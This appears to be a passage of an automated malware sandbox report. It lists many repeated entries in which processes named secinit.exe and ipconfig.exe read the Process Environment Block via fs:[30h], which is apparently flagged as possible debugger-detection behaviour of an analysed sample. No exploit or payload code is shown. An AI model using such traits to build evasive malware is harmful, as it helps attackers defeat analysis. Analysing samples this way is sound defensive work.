Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]	2_2_03842D8A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]	2_2_03842D8A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]	2_2_03842D8A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]	2_2_03842D8A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872990 mov eax, dword ptr fs:[00000030h]	2_2_03872990
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387FD9B mov eax, dword ptr fs:[00000030h]	2_2_0387FD9B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387FD9B mov eax, dword ptr fs:[00000030h]	2_2_0387FD9B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038735A1 mov eax, dword ptr fs:[00000030h]	2_2_038735A1
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038761A0 mov eax, dword ptr fs:[00000030h]	2_2_038761A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038761A0 mov eax, dword ptr fs:[00000030h]	2_2_038761A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C69A6 mov eax, dword ptr fs:[00000030h]	2_2_038C69A6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03871DB5 mov eax, dword ptr fs:[00000030h]	2_2_03871DB5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03871DB5 mov eax, dword ptr fs:[00000030h]	2_2_03871DB5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03871DB5 mov eax, dword ptr fs:[00000030h]	2_2_03871DB5
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]	2_2_038C51BE
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]	2_2_038C51BE
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]	2_2_038C51BE
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]	2_2_038C51BE
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_038C6DC9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_038C6DC9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_038C6DC9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov ecx, dword ptr fs:[00000030h]	2_2_038C6DC9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_038C6DC9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_038C6DC9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0384B1E1
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0384B1E1
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0384B1E1
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038D41E8 mov eax, dword ptr fs:[00000030h]	2_2_038D41E8
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0385D5E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0385D5E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038F8DF1 mov eax, dword ptr fs:[00000030h]	2_2_038F8DF1
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849100 mov eax, dword ptr fs:[00000030h]	2_2_03849100
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849100 mov eax, dword ptr fs:[00000030h]	2_2_03849100
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849100 mov eax, dword ptr fs:[00000030h]	2_2_03849100
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918D34 mov eax, dword ptr fs:[00000030h]	2_2_03918D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]	2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]	2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]	2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]	2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov ecx, dword ptr fs:[00000030h]	2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]	2_2_03853D34
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384AD30 mov eax, dword ptr fs:[00000030h]	2_2_0384AD30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038CA537 mov eax, dword ptr fs:[00000030h]	2_2_038CA537
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874D3B mov eax, dword ptr fs:[00000030h]	2_2_03874D3B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874D3B mov eax, dword ptr fs:[00000030h]	2_2_03874D3B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874D3B mov eax, dword ptr fs:[00000030h]	2_2_03874D3B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387513A mov eax, dword ptr fs:[00000030h]	2_2_0387513A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387513A mov eax, dword ptr fs:[00000030h]	2_2_0387513A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386B944 mov eax, dword ptr fs:[00000030h]	2_2_0386B944
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386B944 mov eax, dword ptr fs:[00000030h]	2_2_0386B944
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03883D43 mov eax, dword ptr fs:[00000030h]	2_2_03883D43
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C3540 mov eax, dword ptr fs:[00000030h]	2_2_038C3540
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03867D50 mov eax, dword ptr fs:[00000030h]	2_2_03867D50
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C962 mov eax, dword ptr fs:[00000030h]	2_2_0384C962
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386C577 mov eax, dword ptr fs:[00000030h]	2_2_0386C577
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386C577 mov eax, dword ptr fs:[00000030h]	2_2_0386C577
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B171 mov eax, dword ptr fs:[00000030h]	2_2_0384B171
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B171 mov eax, dword ptr fs:[00000030h]	2_2_0384B171
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849080 mov eax, dword ptr fs:[00000030h]	2_2_03849080
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C3884 mov eax, dword ptr fs:[00000030h]	2_2_038C3884
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C3884 mov eax, dword ptr fs:[00000030h]	2_2_038C3884
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385849B mov eax, dword ptr fs:[00000030h]	2_2_0385849B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038890AF mov eax, dword ptr fs:[00000030h]	2_2_038890AF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0 mov eax, dword ptr fs:[00000030h]	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0387F0BF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387F0BF mov eax, dword ptr fs:[00000030h]	2_2_0387F0BF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387F0BF mov eax, dword ptr fs:[00000030h]	2_2_0387F0BF
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918CD6 mov eax, dword ptr fs:[00000030h]	2_2_03918CD6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_038DB8D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_038DB8D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_038DB8D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_038DB8D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_038DB8D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_038DB8D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038458EC mov eax, dword ptr fs:[00000030h]	2_2_038458EC
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_039014FB mov eax, dword ptr fs:[00000030h]	2_2_039014FB
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_038C6CF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_038C6CF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_038C6CF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03914015 mov eax, dword ptr fs:[00000030h]	2_2_03914015
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03914015 mov eax, dword ptr fs:[00000030h]	2_2_03914015
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]	2_2_038C6C0A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]	2_2_038C6C0A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]	2_2_038C6C0A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6C0A mov eax, dword ptr fs:[00000030h]	2_2_038C6C0A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901C06 mov eax, dword ptr fs:[00000030h]	2_2_03901C06
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7016 mov eax, dword ptr fs:[00000030h]	2_2_038C7016
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7016 mov eax, dword ptr fs:[00000030h]	2_2_038C7016
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7016 mov eax, dword ptr fs:[00000030h]	2_2_038C7016
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391740D mov eax, dword ptr fs:[00000030h]	2_2_0391740D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391740D mov eax, dword ptr fs:[00000030h]	2_2_0391740D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391740D mov eax, dword ptr fs:[00000030h]	2_2_0391740D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]	2_2_0387002D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]	2_2_0387002D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]	2_2_0387002D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]	2_2_0387002D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387002D mov eax, dword ptr fs:[00000030h]	2_2_0387002D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387BC2C mov eax, dword ptr fs:[00000030h]	2_2_0387BC2C
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]	2_2_0385B02A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]	2_2_0385B02A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]	2_2_0385B02A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B02A mov eax, dword ptr fs:[00000030h]	2_2_0385B02A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A44B mov eax, dword ptr fs:[00000030h]	2_2_0387A44B
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03860050 mov eax, dword ptr fs:[00000030h]	2_2_03860050
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03860050 mov eax, dword ptr fs:[00000030h]	2_2_03860050
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DC450 mov eax, dword ptr fs:[00000030h]	2_2_038DC450
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DC450 mov eax, dword ptr fs:[00000030h]	2_2_038DC450
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03902073 mov eax, dword ptr fs:[00000030h]	2_2_03902073
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03911074 mov eax, dword ptr fs:[00000030h]	2_2_03911074
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386746D mov eax, dword ptr fs:[00000030h]	2_2_0386746D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]	10_2_00BBF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBF0BF mov eax, dword ptr fs:[00000030h]	10_2_00BBF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBF0BF mov eax, dword ptr fs:[00000030h]	10_2_00BBF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	10_2_00C1B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]	10_2_00C1B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	10_2_00C1B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	10_2_00C1B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	10_2_00C1B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]	10_2_00C1B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC90AF mov eax, dword ptr fs:[00000030h]	10_2_00BC90AF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89080 mov eax, dword ptr fs:[00000030h]	10_2_00B89080
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C03884 mov eax, dword ptr fs:[00000030h]	10_2_00C03884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C03884 mov eax, dword ptr fs:[00000030h]	10_2_00C03884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B858EC mov eax, dword ptr fs:[00000030h]	10_2_00B858EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]	10_2_00B9B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]	10_2_00B9B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]	10_2_00B9B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B02A mov eax, dword ptr fs:[00000030h]	10_2_00B9B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]	10_2_00BB002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]	10_2_00BB002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]	10_2_00BB002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]	10_2_00BB002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB002D mov eax, dword ptr fs:[00000030h]	10_2_00BB002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C51074 mov eax, dword ptr fs:[00000030h]	10_2_00C51074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C42073 mov eax, dword ptr fs:[00000030h]	10_2_00C42073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C54015 mov eax, dword ptr fs:[00000030h]	10_2_00C54015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C54015 mov eax, dword ptr fs:[00000030h]	10_2_00C54015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C07016 mov eax, dword ptr fs:[00000030h]	10_2_00C07016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C07016 mov eax, dword ptr fs:[00000030h]	10_2_00C07016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C07016 mov eax, dword ptr fs:[00000030h]	10_2_00C07016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA0050 mov eax, dword ptr fs:[00000030h]	10_2_00BA0050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA0050 mov eax, dword ptr fs:[00000030h]	10_2_00BA0050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB61A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB61A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB61A0 mov eax, dword ptr fs:[00000030h]	10_2_00BB61A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C141E8 mov eax, dword ptr fs:[00000030h]	10_2_00C141E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2990 mov eax, dword ptr fs:[00000030h]	10_2_00BB2990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAC182 mov eax, dword ptr fs:[00000030h]	10_2_00BAC182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA185 mov eax, dword ptr fs:[00000030h]	10_2_00BBA185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	10_2_00B8B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	10_2_00B8B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]	10_2_00B8B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C069A6 mov eax, dword ptr fs:[00000030h]	10_2_00C069A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]	10_2_00C051BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]	10_2_00C051BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]	10_2_00C051BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C051BE mov eax, dword ptr fs:[00000030h]	10_2_00C051BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB513A mov eax, dword ptr fs:[00000030h]	10_2_00BB513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB513A mov eax, dword ptr fs:[00000030h]	10_2_00BB513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]	10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]	10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]	10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov eax, dword ptr fs:[00000030h]	10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120 mov ecx, dword ptr fs:[00000030h]	10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89100 mov eax, dword ptr fs:[00000030h]	10_2_00B89100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89100 mov eax, dword ptr fs:[00000030h]	10_2_00B89100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B89100 mov eax, dword ptr fs:[00000030h]	10_2_00B89100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B171 mov eax, dword ptr fs:[00000030h]	10_2_00B8B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8B171 mov eax, dword ptr fs:[00000030h]	10_2_00B8B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C962 mov eax, dword ptr fs:[00000030h]	10_2_00B8C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAB944 mov eax, dword ptr fs:[00000030h]	10_2_00BAB944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAB944 mov eax, dword ptr fs:[00000030h]	10_2_00BAB944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]	10_2_00B9AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]	10_2_00B9AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]	10_2_00BBFAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]	10_2_00B852A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]	10_2_00B852A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]	10_2_00B852A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]	10_2_00B852A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B852A5 mov eax, dword ptr fs:[00000030h]	10_2_00B852A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBD294 mov eax, dword ptr fs:[00000030h]	10_2_00BBD294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBD294 mov eax, dword ptr fs:[00000030h]	10_2_00BBD294
